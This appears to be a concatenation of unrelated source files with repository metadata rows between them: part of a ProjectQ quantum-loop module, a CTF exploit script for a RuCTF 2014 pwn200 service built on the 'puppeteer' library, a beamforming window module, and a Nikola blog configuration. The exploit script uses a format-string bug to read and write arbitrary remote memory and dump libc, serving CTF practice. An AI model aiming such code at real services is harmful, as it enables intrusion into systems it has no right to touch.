self._deallocated_qubit_ids.add(cmd.qubits[0][0].id)
cmd.tags.append(self._tag)
self.send([cmd])
else:
# LoopTag is not supported, save the full loop body
self._cmd_list += command_list
# Check for all local qubits allocated and deallocated in loop body
for cmd in command_list:
if cmd.gate == Allocate:
self._allocated_qubit_ids.add(cmd.qubits[0][0].id)
# Save reference to this local qubit
self._refs_to_local_qb[cmd.qubits[0][0].id] = [cmd.qubits[0][0]]
elif cmd.gate == Deallocate:
self._deallocated_qubit_ids.add(cmd.qubits[0][0].id)
# Save reference to this local qubit
self._refs_to_local_qb[cmd.qubits[0][0].id].append(cmd.qubits[0][0])
else:
# Add a reference to each place a local qubit id is
# used as within either control_qubit or qubits
for control_qubit in cmd.control_qubits:
if control_qubit.id in self._allocated_qubit_ids:
self._refs_to_local_qb[control_qubit.id].append(control_qubit)
for qureg in cmd.qubits:
for qubit in qureg:
if qubit.id in self._allocated_qubit_ids:
self._refs_to_local_qb[qubit.id].append(qubit)
class Loop:
"""
Loop n times over an entire code block.
Example:
.. code-block:: python
with Loop(eng, 4):
# [quantum gates to be executed 4 times]
Warning:
If the code in the loop contains allocation of qubits, those qubits have to be deleted prior to exiting the
'with Loop()' context.
This code is **NOT VALID**:
.. code-block:: python
with Loop(eng, 4):
qb = eng.allocate_qubit()
H | qb # qb is still available!!!
The **correct way** of handling qubit (de-)allocation is as follows:
.. code-block:: python
with Loop(eng, 4):
qb = eng.allocate_qubit()
...
del qb # sends deallocate gate
"""
def __init__(self, engine, num):
"""
Enter a looped section.
Args:
engine: Engine handling the commands (usually MainEngine)
num (int): Number of loop iterations
Example:
.. code-block:: python
with Loop(eng, 4):
H | qb
Rz(M_PI/3.) | qb
Raises:
TypeError: If number of iterations (num) is not an integer
ValueError: If number of iterations (num) is not >= 0
"""
self.engine = engine
if not isinstance(num, int):
raise TypeError("Number of loop iterations must be an int.")
if num < 0:
raise ValueError("Number of loop iterations must be >=0.")
self.num = num
self._loop_eng = None
def __enter__(self):
if self.num != 1:
self._loop_eng = LoopEngine(self.num)
insert_engine(self.engine, self._loop_eng)
def __exit__(self, exc_type, exc_value, exc_traceback):
if self.num != 1:
# remove loop handler from engine list (i.e. skip it)
self._loop_eng.run()
self._loop_eng = None
drop_engine_after(self.engine)
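# Minimal end-to-end sketch (assumes the standard MainEngine and gate imports;
# illustrative only, not part of this module):
#
#   from projectq import MainEngine
#   from projectq.ops import H, Measure
#
#   eng = MainEngine()
#   qubit = eng.allocate_qubit()
#   with Loop(eng, 4):
#       H | qubit
#   Measure | qubit
#   eng.flush()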
|
apache-2.0
| -7,039,027,857,358,893,000
| 37.031128
| 115
| 0.562717
| false
| 4.138019
| false
| false
| false
|
shellphish/puppeteer
|
examples/ructf_2014_pwn200/doit.py
|
1
|
2635
|
import puppeteer as p
import logging
import sys
try:
import standard_logging # pylint: disable=W0611
except ImportError:
pass
#logging.getLogger("puppeteer.connection").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.manipulator").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.vuln_decorators").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.formatter").setLevel(logging.DEBUG)
class Aggravator(p.Manipulator):
def __init__(self, host, port):
p.Manipulator.__init__(self, p.x86)
# some initial info from IDA
# TODO: maybe use IDALink to get this automatically?
self.permanent_info['main_start'] = 0x0804A9B3
self.permanent_info['main_end'] = 0x0804A9D1
self.permanent_info['main_stackframe_size'] = 0x24
self.c = self.set_connection(p.Connection(host=host, port=port).connect())
self.c.read_until("> ")
@p.printf(byte_offset=244, max_length=31, forbidden={'\x00', '\x0a'})
def stats_printf(self, fmt):
self.c.send("stats " + fmt + "\n")
self.c.read_until("kill top:\n")
try:
result = self.c.read_until("\n"*5, timeout=3)[:-5]
self.c.read_until("> ", timeout=3)
except EOFError:
print "Program didn't finish the print"
return ""
#print "GOT:",repr(result)
return result
def main():
# Create the Aggravator!
a = Aggravator(sys.argv[1], int(sys.argv[2]))
# And now, we can to stuff!
# We can read the stack!
#print "STACKZ",a.dump_stack(1000).encode('hex')
print "Testing memory read."
assert a.do_memory_read(0x0804A9C3, 16) == '\x00\x8B\x44\x24\x1C\x89\x04\x24\xE8\x20\xFE\xFF\xFF\xC9\xC3\x66'
## We can figure out where __libc_start_main is!
lcsm = a.main_return_address(start_offset=390)
print "main() will return to (presumably, this is in libc):",hex(lcsm)
# interactive memory explorer!
a.memory_explorer(lcsm)
# now dump it!
libc = a.dump_elf(lcsm) #- 0x1000 # the minus is because on my test machine, the address has a \x00 in it
print "dumped %d pages from libc" % len(libc)
#a.dump_libc("aggregator_libc", start_offset=390)
# We can overwrite memory with ease!
a.do_memory_write(0x0804C344, "OK")
assert a.do_memory_read(0x0804C344, 2) == "OK"
a.c.send("quit\n")
#libc_page_start = lcsm & 0xfffff000
#libc_page_content = a.do_memory_read(libc_page_start, 0x1000)
#open("dumped", "w").write(libc_page_content)
#print "read out %d bytes from libc!" % len(libc_page_content)
if __name__ == '__main__':
import sys
main()
|
gpl-3.0
| -910,140,454,615,389,800
| 33.671053
| 113
| 0.639848
| false
| 2.987528
| false
| false
| false
|
jpaasen/cos
|
framework/Window.py
|
1
|
5925
|
#from TypeExtensions import Ndarray
from gfuncs import processArgs
from mynumpy import pi, dot, cos, sin, exp #ones, complex, sin, linspace, exp, pi, dot, angle
import mynumpy as np
#from pylab import plot, subplot, xlabel, ylabel, grid, show, figure, ion, ioff
class Window(np.Ndarray):
def __new__(self, type='rect', **kwargs):
from gfuncs import error
if type == 'rect':
            return Rect(**kwargs)
elif type == 'kaiser':
            return Kaiser(**kwargs)
else:
error(self, 'The window type %s is not recognised'%type)
#
# Configurable.__init__(self)
# Operable.__init__(self)
class Rect(np.Ndarray):
def __new__(self, M=10, phi=0, normalised=True):
# Create the window
if phi == 0:
win = np.ones( (M,), dtype=None ) / M
else:
wc = np.ones( M, dtype=complex ) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Rectangular (phi=%d)'%phi)
# desc='Rectangular (phi=%d)'%phi,
# shape_desc=('M','1'))
return w
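# Note (a sketch of the maths above, not part of the original code): with unit
# coefficients the steered window reduces to
#     win[m] = exp(-1j*2*pi*m*phi) / sum_k exp(-1j*2*pi*k*phi),
# i.e. a uniform taper phase-steered towards phi and scaled so its coefficients
# sum to one; Trig and Kaiser below apply the same steering and normalisation
# to their respective tapers.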
class Trig(np.Ndarray):
def __new__(self, M=10, a=0.54, phi=0, normalised=True):
# Create the window
if phi == 0:
wc = a + (1-a)*np.cos(2*pi*np.linspace(-0.5,0.5,M))
win = wc / sum(wc) # Normalised window
else:
n = np.linspace(-0.5,0.5,M)
wc = a + (1-a)*np.cos(2*pi*n) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
aa = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, aa) # Normalisation factor
win = aa * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Rectangular (phi=%d)'%phi)
# desc='Rectangular (phi=%d)'%phi,
# shape_desc=('M','1'))
return w
class Kaiser(np.Ndarray):
'''kaiser( M=10, beta=1, phi=0, normalised=True )
The Kaiser window is a taper formed by using a Bessel function.
Parameters
----------
M (int) : Number of points in the output window.
beta (float) : Shape parameter for window.
phi (float) : Steering angle.
normalised (boolean) : Use normalised window coefficients?
'''
def __new__(self, M=10, beta=1, phi=0, normalised=True, inverted=False):
if not inverted:
if phi == 0:
wc = np.kaiser(M, beta) # Window coefficients
win = wc / sum(wc) # Normalised window
else:
wc = np.kaiser(M, beta) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
else:
if phi == 0:
wc = 1 / np.kaiser(M, beta) # Window coefficients
win = wc / sum(wc) # Normalised window
else:
wc = 1 / np.kaiser(M, beta) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc,a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Kaiser (beta=%d, phi=%d)'%(beta,phi))
# shape_desc=('M','1'))
return w
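# Usage sketch (parameter values are illustrative only):
#
#   w0 = Kaiser(M=16, beta=3)            # real coefficients summing to 1
#   w1 = Kaiser(M=16, beta=3, phi=0.1)   # complex-valued, steered towards phi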
# def plot(self, **kwargs):
#
# # Set some default options
# opts = {'magnitude':True, 'angle':False, 'grid':True, 'degrees':True}
#
# # Add the user-specified options
# for key,val in kwargs.iteritems():
# if opts.has_key(key):
# opts[key] = val
# else:
# opts[key] = val
# print 'WW: Window.plot() - Supplied parameter '+key+' is unknown.'
#
# ion()
# if opts['magnitude'] and opts['angle']:
# figure()
# subplot(2,1,1)
# plot( abs(self.w) )
# xlabel( 'Channel #' )
# ylabel( 'Magnitude' )
# grid( opts['grid'] )
#
# subplot(2,1,2)
# plot( angle(self.w, deg=opts['degrees']) )
# xlabel( 'Channel #' )
# if opts['degrees']:
# ylabel( 'Angle [degrees]' )
# else:
# ylabel( 'Angle [radians]' )
# grid( opts['grid'] )
## show()
#
# elif opts['magnitude']:
# figure()
# plot( abs(self.w) )
# xlabel( 'Channel #' )
# ylabel( 'Magnitude' )
# grid( opts['grid'] )
## show()
#
# else:
# figure()
# plot( angle(self.w, deg=opts['degrees']) )
# xlabel( 'Channel #' )
# if opts['degrees']:
# ylabel( 'Angle [degrees]' )
# else:
# ylabel( 'Angle [radians]' )
# grid( opts['grid'] )
## show()
# ioff()
|
mit
| 5,193,458,981,794,878,000
| 36.5
| 93
| 0.4427
| false
| 3.58006
| false
| false
| false
|
masterdje/wibfi
|
conf.py
|
1
|
22684
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
# Configuration, please edit
# Data about this site
BLOG_AUTHOR = "Dje"
BLOG_TITLE = "Write it before forget it!"
# This is the main URL for your site. It will be used
# in a prominent link
SITE_URL = "http://wibfi.virtua-peanuts.net/"
# This is the URL where nikola's output will be deployed.
# If not set, defaults to SITE_URL
# BASE_URL = "http://getnikola.com/"
BLOG_EMAIL = "wibfi@virtua-peanuts.net"
BLOG_DESCRIPTION = "Write it before forget it !"
# Nikola is multilingual!
#
# Currently supported languages are:
# en English
# bg Bulgarian
# ca Catalan
# zh_cn Chinese (Simplified)
# hr Croatian
# nl Dutch
# fr French
# el Greek [NOT gr!]
# de German
# it Italian
# jp Japanese
# fa Persian
# pl Polish
# pt_br Portuguese (Brasil)
# ru Russian
# es Spanish
# tr_tr Turkish (Turkey)
#
# If you want to use Nikola with a non-supported language you have to provide
# a module containing the necessary translations
# (e.g., look at the modules at: ./nikola/data/themes/default/messages/fr.py).
# If a specific post is not translated to a language, then the version
# in the default language will be shown instead.
#from nikola import filters
#FILTERS = {
# ".css": [filters.yui_compressor],
#".js": [filters.yui_compressor],
#}
# What is the default language?
DEFAULT_LANG = "fr"
LOCALES = {'fr': 'fr_FR.utf8', 'en': 'en_US.utf8'}
# What other languages do you have?
# The format is {"translationcode" : "path/to/translation" }
# the path will be used as a prefix for the generated pages location
TRANSLATIONS = {
DEFAULT_LANG: "",
# Example for another language:
"en": "./en",
}
TRANSLATIONS_PATTERN = "{path}.{ext}.{lang}"
# Links for the sidebar / navigation bar.
# You should provide a key-value pair for each used language.
NAVIGATION_LINKS = {
DEFAULT_LANG: (
('/stories/cheatsheets.html', "Cheat-Sheets"),
('/stories/what-s-next.html', "What's next"),
('/archive.html', 'Archives'),
('/categories/index.html', 'Tags'),
('/rss.xml', 'RSS'),
),
"en": (
('/en/stories/cheatsheets.html', "Cheat-Sheets"),
('/en/stories/what-s-next.html', "What's next"),
('/en/archive.html', 'Archives'),
('/en/categories/index.html', 'Tags'),
('/en/rss.xml', 'RSS'),
),
}
# Below this point, everything is optional
# POSTS and PAGES contains (wildcard, destination, template) tuples.
#
# The wildcard is used to generate a list of reSt source files
# (whatever/thing.txt).
#
# That fragment could have an associated metadata file (whatever/thing.meta),
# and optionally translated files (example for Spanish, with code "es"):
# whatever/thing.txt.es and whatever/thing.meta.es
#
# From those files, a set of HTML fragment files will be generated:
# cache/whatever/thing.html (and maybe cache/whatever/thing.html.es)
#
# These files are combined with the template to produce rendered
# pages, which will be placed at
# output / TRANSLATIONS[lang] / destination / pagename.html
#
# where "pagename" is the "slug" specified in the metadata file.
#
# The difference between POSTS and PAGES is that POSTS are added
# to feeds and are considered part of a blog, while PAGES are
# just independent HTML pages.
#
POSTS = (
("posts/*.txt", "posts", "post.tmpl"),
("posts/*.rst", "posts", "post.tmpl"),
)
PAGES = (
("stories/*.txt", "stories", "story.tmpl"),
("stories/*.rst", "stories", "story.tmpl"),
)
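# Worked example (illustrative, not part of the original configuration): with the
# POSTS entry above and TRANSLATIONS_PATTERN = "{path}.{ext}.{lang}", a source
# file posts/hello.txt with slug "hello" is rendered through post.tmpl to
# output/posts/hello.html, while its English translation posts/hello.txt.en ends
# up at output/en/posts/hello.html (TRANSLATIONS maps "en" to "./en").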
# One or more folders containing files to be copied as-is into the output.
# The format is a dictionary of "source" "relative destination".
# Default is:
FILES_FOLDERS = { 'test': '', 'test': 'posts/','test': 'stories/'}
# Which means copy 'files' into 'output'
# A mapping of languages to file-extensions that represent that language.
# Feel free to add or delete extensions to any list, but don't add any new
# compilers unless you write the interface for it yourself.
#
# 'rest' is reStructuredText
# 'markdown' is MarkDown
# 'html' assumes the file is html and just copies it
COMPILERS = {
"rest": ('.rst', '.txt'),
"markdown": ('.md', '.mdown', '.markdown'),
"textile": ('.textile',),
"txt2tags": ('.t2t',),
"bbcode": ('.bb',),
"wiki": ('.wiki',),
"ipynb": ('.ipynb',),
"html": ('.html', '.htm'),
}
# Create by default posts in one file format?
# Set to False for two-file posts, with separate metadata.
ONE_FILE_POSTS = True
# If this is set to True, then posts that are not translated to a language
# LANG will not be visible at all in the pages in that language.
# If set to False, the DEFAULT_LANG version will be displayed for
# untranslated posts.
# HIDE_UNTRANSLATED_POSTS = False
# Paths for different autogenerated bits. These are combined with the
# translation paths.
# Final locations are:
# output / TRANSLATION[lang] / TAG_PATH / index.html (list of tags)
# output / TRANSLATION[lang] / TAG_PATH / tag.html (list of posts for a tag)
# output / TRANSLATION[lang] / TAG_PATH / tag.xml (RSS feed for a tag)
TAG_PATH = "categories"
# If TAG_PAGES_ARE_INDEXES is set to True, each tag's page will contain
# the posts themselves. If set to False, it will be just a list of links.
# TAG_PAGES_ARE_INDEXES = True
# Final location is output / TRANSLATION[lang] / INDEX_PATH / index-*.html
# INDEX_PATH = ""
# Create per-month archives instead of per-year
CREATE_MONTHLY_ARCHIVE = True
# Final locations for the archives are:
# output / TRANSLATION[lang] / ARCHIVE_PATH / ARCHIVE_FILENAME
# output / TRANSLATION[lang] / ARCHIVE_PATH / YEAR / index.html
# output / TRANSLATION[lang] / ARCHIVE_PATH / YEAR / MONTH / index.html
# ARCHIVE_PATH = ""
# ARCHIVE_FILENAME = "archive.html"
# Final locations are:
# output / TRANSLATION[lang] / RSS_PATH / rss.xml
# RSS_PATH = ""
# Number of posts in RSS feeds
FEED_LENGTH = 10
# Slug the Tag URL easier for users to type, special characters are
# often removed or replaced as well.
# SLUG_TAG_PATH = True
# A list of redirection tuples, [("foo/from.html", "/bar/to.html")].
#
# A HTML file will be created in output/foo/from.html that redirects
# to the "/bar/to.html" URL. notice that the "from" side MUST be a
# relative URL.
#
# If you don't need any of these, just set to []
# REDIRECTIONS = []
# Commands to execute to deploy. Can be anything, for example,
# you may use rsync:
# And then do a backup, or ping pingomatic.
# To do manual deployment, set it to []
DEPLOY_COMMANDS = ['lftp -e "mirror --delete-first -R output/ .;exit" u45372881@virtua-peanuts.net/wibfi',
'echo Save ...',
'cd .. ; tar cvjf _save-wibfi_.tgz wibfi/ ; lftp -e "put _save-wibfi_.tgz;exit" u45372881@virtua-peanuts.net/wibfi/backup; cd wibfi']
# Where the output site should be located
# If you don't use an absolute path, it will be considered as relative
# to the location of conf.py
# OUTPUT_FOLDER = 'output'
# where the "cache" of partial generated content should be located
# default: 'cache'
# CACHE_FOLDER = 'cache'
# Filters to apply to the output.
# A directory where the keys are either: a file extensions, or
# a tuple of file extensions.
#
# And the value is a list of commands to be applied in order.
#
# Each command must be either:
#
# A string containing a '%s' which will
# be replaced with a filename. The command *must* produce output
# in place.
#
# Or:
#
# A python callable, which will be called with the filename as
# argument.
#
# By default, there are no filters.
# FILTERS = {
# ".jpg": ["jpegoptim --strip-all -m75 -v %s"],
# }
# Create a gzipped copy of each generated file. Cheap server-side optimization.
GZIP_FILES = True
# File extensions that will be compressed
GZIP_EXTENSIONS = ('.txt','.rst', '.htm', '.html', '.css', '.js', '.json')
# #############################################################################
# Image Gallery Options
# #############################################################################
# Galleries are folders in galleries/
# Final location of galleries will be output / GALLERY_PATH / gallery_name
# GALLERY_PATH = "galleries"
# THUMBNAIL_SIZE = 180
# MAX_IMAGE_SIZE = 1280
# USE_FILENAME_AS_TITLE = True
# #############################################################################
# HTML fragments and diverse things that are used by the templates
# #############################################################################
# Data about post-per-page indexes
# INDEXES_TITLE = "" # If this is empty, the default is BLOG_TITLE
# INDEXES_PAGES = "" # If this is empty, the default is 'old posts page %d'
# translated
# Name of the theme to use.
THEME = "w2"
# Color scheme to be used for code blocks. If your theme provides
# "assets/css/code.css" this is ignored.
# Can be any of autumn borland bw colorful default emacs friendly fruity manni
# monokai murphy native pastie perldoc rrt tango trac vim vs
CODE_COLOR_SCHEME = 'borland'
# If you use 'site-reveal' theme you can select several subthemes
# THEME_REVEAL_CONFIG_SUBTHEME = 'sky'
# You can also use: beige/serif/simple/night/default
# Again, if you use 'site-reveal' theme you can select several transitions
# between the slides
# THEME_REVEAL_CONFIG_TRANSITION = 'cube'
# You can also use: page/concave/linear/none/default
# date format used to display post dates.
# (str used by datetime.datetime.strftime)
# DATE_FORMAT = '%Y-%m-%d %H:%M'
# FAVICONS contains (name, file, size) tuples.
# Used for create favicon link like this:
# <link rel="name" href="file" sizes="size"/>
# For creating favicons, take a look at:
# http://www.netmagazine.com/features/create-perfect-favicon
FAVICONS = {
("icon", "/favicon.ico", "16x16"),
("icon", "/favicon.png", "64x64"),
}
# Show only teasers in the index pages? Defaults to False.
INDEX_TEASERS = True
# A HTML fragment with the Read more... link.
# The following tags exist and are replaced for you:
# {link} A link to the full post page.
# {read_more} The string “Read more” in the current language.
# {{ A literal { (U+007B LEFT CURLY BRACKET)
# }} A literal } (U+007D RIGHT CURLY BRACKET)
READ_MORE_LINK = '<p class="more"><a href="{link}">{read_more}…</a></p>'
# A HTML fragment describing the license, for the sidebar.
LICENSE = '<a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/fr/"><img title="TL;DR" alt="Licence Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-sa/3.0/fr/88x31.png" /></a>'
# I recommend using the Creative Commons' wizard:
# http://creativecommons.org/choose/
# LICENSE = """
# <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/ar/">
# <img alt="Creative Commons License BY-NC-SA"
# style="border-width:0; margin-bottom:12px;"
# src="http://i.creativecommons.org/l/by-nc-sa/2.5/ar/88x31.png"></a>"""
# A small copyright notice for the page footer (in HTML).
# Default is ''
XITI = """<a href="http://www.xiti.com/xiti.asp?s=538203" title="WebAnalytics" target="_top">
<script type="text/javascript">
<!--
Xt_param = 's=538203&p=index';
try {Xt_r = top.document.referrer;}
catch(e) {Xt_r = document.referrer; }
Xt_h = new Date();
Xt_i = '<img width="80" height="15" border="0" alt="" ';
Xt_i += 'src="http://logv4.xiti.com/g.xiti?'+Xt_param;
Xt_i += '&hl='+Xt_h.getHours()+'x'+Xt_h.getMinutes()+'x'+Xt_h.getSeconds();
if(parseFloat(navigator.appVersion)>=4)
{Xt_s=screen;Xt_i+='&r='+Xt_s.width+'x'+Xt_s.height+'x'+Xt_s.pixelDepth+'x'+Xt_s.colorDepth;}
document.write(Xt_i+'&ref='+Xt_r.replace(/[<>"]/g, '').replace(/&/g, '$')+'" title="Internet Audience">');
//-->
</script>
<noscript>
<img width="80" height="15" src="http://logv4.xiti.com/g.xiti?s=538203&p=index" alt="WebAnalytics" />
</noscript></a>"""
CONTENT_FOOTER = '2013 - {date} <a href="mailto:{email}">{author}</a> mais c\'est <a href="http://getnikola.com">Nikola</a> qui propulse. {license} - {xiti}'
CONTENT_FOOTER = CONTENT_FOOTER.format(email=BLOG_EMAIL,
author=BLOG_AUTHOR,
date=time.gmtime().tm_year,
license=LICENSE, xiti=XITI)
# To use comments, you can choose between different third party comment
# systems, one of "disqus", "livefyre", "intensedebate", "moot",
# "googleplus" or "facebook"
COMMENT_SYSTEM = "disqus"
# And you also need to add your COMMENT_SYSTEM_ID which
# depends on what comment system you use. The default is
# "nikolademo" which is a test account for Disqus. More information
# is in the manual.
COMMENT_SYSTEM_ID = "wibfi"
# Create index.html for story folders?
# STORY_INDEX = False
# Enable comments on story pages?
# COMMENTS_IN_STORIES = False
# Enable comments on picture gallery pages?
# COMMENTS_IN_GALLERIES = False
# What file should be used for directory indexes?
# Defaults to index.html
# Common other alternatives: default.html for IIS, index.php
# INDEX_FILE = "index.html"
# If a link ends in /index.html, drop the index.html part.
# http://mysite/foo/bar/index.html => http://mysite/foo/bar/
# (Uses the INDEX_FILE setting, so if that is, say, default.html,
# it will instead /foo/default.html => /foo)
# (Note: This was briefly STRIP_INDEX_HTML in v 5.4.3 and 5.4.4)
# Default = False
# STRIP_INDEXES = False
# Should the sitemap list directories which only include other directories
# and no files.
# Default to True
# If this is False
# e.g. /2012 includes only /01, /02, /03, /04, ...: don't add it to the sitemap
# if /2012 includes any files (including index.html)... add it to the sitemap
# SITEMAP_INCLUDE_FILELESS_DIRS = True
# Instead of putting files in <slug>.html, put them in
# <slug>/index.html. Also enables STRIP_INDEXES
# This can be disabled on a per-page/post basis by adding
# .. pretty_url: False
# to the metadata
# PRETTY_URLS = False
# If True, publish future dated posts right away instead of scheduling them.
# Defaults to False.
# FUTURE_IS_NOW = False
# If True, future dated posts are allowed in deployed output
# Only the individual posts are published/deployed; not in indexes/sitemap
# Generally, you want FUTURE_IS_NOW and DEPLOY_FUTURE to be the same value.
# DEPLOY_FUTURE = False
# If False, draft posts will not be deployed
# DEPLOY_DRAFTS = True
# Allows scheduling of posts using the rule specified here (new_post -s)
# Specify an iCal Recurrence Rule: http://www.kanzaki.com/docs/ical/rrule.html
#SCHEDULE_RULE = 'RRULE:FREQ=DAILY;BYHOUR=12;BYMINUTE=0;BYSECOND=0'
# If True, use the scheduling rule to all posts by default
SCHEDULE_ALL = False
# If True, schedules post to today if possible, even if scheduled hour is over
# SCHEDULE_FORCE_TODAY = False
# Do you want a add a Mathjax config file?
# MATHJAX_CONFIG = ""
# If you are using the compile-ipynb plugin, just add this one:
#MATHJAX_CONFIG = """
#<script type="text/x-mathjax-config">
#MathJax.Hub.Config({
# tex2jax: {
# inlineMath: [ ['$','$'], ["\\\(","\\\)"] ],
# displayMath: [ ['$$','$$'], ["\\\[","\\\]"] ]
# },
# displayAlign: 'left', // Change this to 'center' to center equations.
# "HTML-CSS": {
# styles: {'.MathJax_Display': {"margin": 0}}
# }
#});
#</script>
#"""
# What MarkDown extensions to enable?
# You will also get gist, nikola and podcast because those are
# done in the code, hope you don't mind ;-)
# MARKDOWN_EXTENSIONS = ['fenced_code', 'codehilite']
# Social buttons. This is sample code for AddThis (which was the default for a
# long time). Insert anything you want here, or even make it empty.
SOCIAL_BUTTONS_CODE = ""
# <!-- Social buttons -->
# <div id="addthisbox" class="addthis_toolbox addthis_peekaboo_style addthis_default_style addthis_label_style addthis_32x32_style">
# <a class="addthis_button_more">Share</a>
# <ul><li><a class="addthis_button_facebook"></a>
# <li><a class="addthis_button_google_plusone_share"></a>
# <li><a class="addthis_button_linkedin"></a>
# <li><a class="addthis_button_twitter"></a>
# </ul>
# </div>
# <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4f7088a56bb93798"></script>
# <!-- End of social buttons -->
#"""
# Hide link to source for the posts?
HIDE_SOURCELINK = True
# Copy the source files for your pages?
# Setting it to False implies HIDE_SOURCELINK = True
COPY_SOURCES = False
# Modify the number of Post per Index Page
# Defaults to 10
INDEX_DISPLAY_POST_COUNT = 10
# RSS_LINK is a HTML fragment to link the RSS or Atom feeds. If set to None,
# the base.tmpl will use the feed Nikola generates. However, you may want to
# change it for a feedburner feed or something else.
# RSS_LINK = None
# Show only teasers in the RSS feed? Default to True
RSS_TEASERS = True
# A search form to search this site, for the sidebar. You can use a google
# custom search (http://www.google.com/cse/)
# Or a duckduckgo search: https://duckduckgo.com/search_box.html
# Default is no search form.
# SEARCH_FORM = ""
#
# This search form works for any site and looks good in the "site" theme where
# it appears on the navigation bar:
#
SEARCH_FORM = """
<!-- Custom search -->
<form method="get" id="search" action="http://duckduckgo.com/"
class="navbar-form pull-left">
<input type="hidden" name="sites" value="%s"/>
<input type="hidden" name="k8" value="#444444"/>
<input type="hidden" name="k9" value="#D51920"/>
<input type="hidden" name="kt" value="h"/>
<input type="text" name="q" maxlength="255" placeholder="DuckDuckGo…" class="span2 form-control input-sm" style="width:65%%; padding:0; height:2em;"/>
<input type="submit" value="DuckDuckGo Search" style="visibility: hidden; width: 5%%" />
</form>
<!-- End of custom search -->
""" % SITE_URL
#
# If you prefer a google search form, here's an example that should just work:
#SEARCH_FORM = """
#<!-- Custom search with google-->
#<form id="search" action="http://google.com/search" method="get" class="navbar-form pull-left">
#<input type="hidden" name="q" value="site:%s" />
#<input type="text" name="q" maxlength="255" results="0" placeholder="Search"/>
#</form>
#<!-- End of custom search -->
#""" % SITE_URL
# Also, there is a local search plugin you can use, based on Tipue, but it requires setting several
# options:
# SEARCH_FORM = """
# <span class="navbar-form pull-left">
# <input type="text" id="tipue_search_input">
# </span>"""
#
# BODY_END = """
# <script type="text/javascript" src="/assets/js/tipuesearch_set.js"></script>
# <script type="text/javascript" src="/assets/js/tipuesearch.js"></script>
# <script type="text/javascript">
# $(document).ready(function() {
# $('#tipue_search_input').tipuesearch({
# 'mode': 'json',
# 'contentLocation': '/assets/js/tipuesearch_content.json',
# 'showUrl': false
# });
# });
# </script>
# """
EXTRA_HEAD_DATA = """
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-44317802-1']);
_gaq.push(['_setDomainName', 'virtua-peanuts.net']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>"""
# <link rel="stylesheet" type="text/css" href="/assets/css/tipuesearch.css">
# <div id="tipue_search_content" style="margin-left: auto; margin-right: auto; padding: 20px;"></div>
# ENABLED_EXTRAS = ['local_search']
#
# Use content distribution networks for jquery and twitter-bootstrap css and js
# If this is True, jquery is served from the Google CDN and twitter-bootstrap
# is served from the NetDNA CDN
# Set this to False if you want to host your site without requiring access to
# external resources.
# USE_CDN = False
# Extra things you want in the pages HEAD tag. This will be added right
# before </HEAD>
# EXTRA_HEAD_DATA = ""
# Google analytics or whatever else you use. Added to the bottom of <body>
# in the default template (base.tmpl).
# BODY_END = ""
# The possibility to extract metadata from the filename by using a
# regular expression.
# To make it work you need to name parts of your regular expression.
# The following names will be used to extract metadata:
# - title
# - slug
# - date
# - tags
# - link
# - description
#
# An example re is the following:
# '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)-(?P<title>.*)\.md'
# FILE_METADATA_REGEXP = None
# Additional metadata that is added to a post when creating a new_post
ADDITIONAL_METADATA = {}
# Nikola supports Twitter Card summaries / Open Graph.
# Twitter cards make it possible for you to attach media to Tweets
# that link to your content.
#
# IMPORTANT:
# Please note, that you need to opt-in for using Twitter Cards!
# To do this please visit
# https://dev.twitter.com/form/participate-twitter-cards
#
# Uncomment and modify to following lines to match your accounts.
# Specifying the id for either 'site' or 'creator' will be preferred
# over the cleartext username. Specifying an ID is not necessary.
# Displaying images is currently not supported.
# TWITTER_CARD = {
# # 'use_twitter_cards': True, # enable Twitter Cards / Open Graph
# # 'site': '@website', # twitter nick for the website
# # 'site:id': 123456, # Same as site, but the website's Twitter user ID
# # instead.
# # 'creator': '@username', # Username for the content creator / author.
# # 'creator:id': 654321, # Same as creator, but the Twitter user's ID.
# }
# If you want to use formatted post time in W3C-DTF Format
# (ex. 2012-03-30T23:00:00+02:00),
# set timezone if you want a localized posted date.
#
TIMEZONE = 'Europe/Paris'
# If webassets is installed, bundle JS and CSS to make site loading faster
# USE_BUNDLES = True
# Plugins you don't want to use. Be careful :-)
# DISABLED_PLUGINS = ["render_galleries"]
# Experimental plugins - use at your own risk.
# They probably need some manual adjustments - please see their respective
# readme.
ENABLED_EXTRAS = [
# 'planetoid',
# 'ipynb',
# 'local_search',
# 'render_mustache',
]
# List of regular expressions, links matching them will always be considered
# valid by "nikola check -l"
# LINK_CHECK_WHITELIST = []
# If set to True, enable optional hyphenation in your posts (requires pyphen)
# HYPHENATE = False
# Put in global_context things you want available on all your templates.
# It can be anything, data, functions, modules, etc.
GLOBAL_CONTEXT = {}
|
gpl-3.0
| -2,642,146,339,466,596,400
| 34.269051
| 225
| 0.670915
| false
| 3.153226
| false
| false
| false
|
xuanthuong/golfgame
|
